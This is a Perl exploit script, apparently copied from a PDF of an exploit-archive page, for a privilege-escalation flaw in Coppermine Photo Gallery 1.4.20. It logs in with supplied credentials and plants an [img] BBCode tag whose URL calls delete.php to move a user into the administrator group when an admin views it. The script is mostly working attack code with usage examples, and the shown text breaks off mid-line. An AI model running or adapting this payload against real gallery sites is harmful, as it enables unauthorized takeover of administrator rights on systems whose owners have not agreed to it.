1 #!/usr/bin/perl
2 #inphex − inphex0 at gmail dot com
3 #based on http://milw0rm.com/exploits/8114 − found by StAkeR
4 #In case this does not work check out pos(Line 80) and find another value for it
5 use IO::Socket;
6 use LWP::UserAgent;
7 use LWP::Simple;
8 use HTTP::Cookies;
9 $_1 = shift; #[HOST]
10 $h = ($_1 eq ""?($n = 0):($n = 1));
11 $_2 = shift; #[PATH]
12 $_3 = shift; #[ID]
13 $_4 = shift; #[ALBUMNUM]
14 $_5 = shift; #[USER]
15 $_6 = shift; #[PASS]
16 $d_p = 80;
17 if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
18
print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
19
print "perl coppermine host.com /path/ 3 2 inphex 123456";
20
exit;
21 }
22 if ($h) {
23
$socket = IO::Socket::INET−>new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[−]ERROR");
24
print $socket "GET $_2 HTTP/1.1\n";
25 print $socket "Host: $_1\n";
26 print $socket "Accept: */*\n";
27 print $socket "Connection: close\n\n";
28
29
while ($answer = <$socket>) {
30
$f_answer = $f_answer.$answer;
31
}
32
$url = &gen_url($_1,$_2,$_3);
33
if ($url) {
34
$code = &gen_code($url);
35
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
36
}
37
38 }
39
40 sub gen_url($$) {
41
$h = shift;
42
$p = shift;
43
$i = shift;
44
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete
_comments=no";
45
return $url;
46 }
47 sub gen_code($) {
48
$url = shift;
49
$code = "yoyoyo[img]".$url."[/img]";
50
return $code;
51 }
Page 1/3
Coppermine Photo Gallery 1.4.20 IMG Privilege Escalation Exploit
Inphex
02/26/2009
52 sub _send($$$$) {
53
$h = "http://".shift;
54
$p = shift;
55
$i = shift;
56
$aid = shift;
57
$co = shift;
58
$u = shift;
59
$pass = shift;
60
61
$xpl = LWP::UserAgent−>new() or die;
62
$cookie_jar = HTTP::Cookies−>new();
63
$xpl−>cookie_jar( $cookie_jar );
64
65
$login = $xpl−>post($h.$p.’login.php?referer=index.php’,
66
Content => [
67
"username" => $u,
68
"password" => $pass,
69
"submitted" => "Login",
70
],);
71
if($c